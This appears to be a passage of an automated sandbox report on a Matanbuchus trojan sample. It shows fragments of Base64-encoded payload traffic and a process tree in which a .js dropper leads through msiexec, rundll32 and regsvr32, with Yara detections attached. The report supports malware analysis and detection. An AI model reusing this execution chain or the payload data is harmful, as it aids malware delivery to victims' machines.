51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
2024-12-06 21:13:13 UTC	16384	IN	Data Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73 Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
2024-12-06 21:13:13 UTC	16384	IN	Data Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
2024-12-06 21:13:13 UTC	16384	IN	Data Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 6b 64 47 36 68 6a 65 76 47 6e Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
2024-12-06 21:13:13 UTC	16384	IN	Data Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32 Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
2024-12-06 21:13:13 UTC	16384	IN	Data Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38 Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
2024-12-06 21:13:13 UTC	16384	IN	Data Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51 Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
2024-12-06 21:13:13 UTC	16384	IN	Data Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79 Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
2024-12-06 21:13:13 UTC	16384	IN	Data Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55 Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
2024-12-06 21:13:13 UTC	16384	IN	Data Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42 Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB

Target ID:	0
Start time:	16:11:01
Start date:	06/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js"
Imagebase:	0x7ff756c60000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	1
Start time:	16:11:01
Start date:	06/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff77ea80000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	3
Start time:	16:11:06
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding A3003A09105FCE67A0C91E88C1FC90DC
Imagebase:	0xc90000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	16:11:06
Start date:	06/12/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
Imagebase:	0x7ff6a2a40000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	5
Start time:	16:11:06
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
Imagebase:	0x460000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000005.00000002.3322347292.0000000004930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Target ID:	6
Start time:	16:11:11
Start date:	06/12/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
Imagebase:	0x7ff6a62f0000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	16:11:11
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
Imagebase:	0xe30000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000007.00000002.2414164418.0000000005753000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000007.00000002.2414164418.0000000005753000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	16:12:10
Start date:	06/12/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
Imagebase:	0x7ff6a62f0000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	11
Start time:	16:12:10
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
Imagebase:	0xe30000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000B.00000002.2937064236.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000B.00000002.2937064236.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true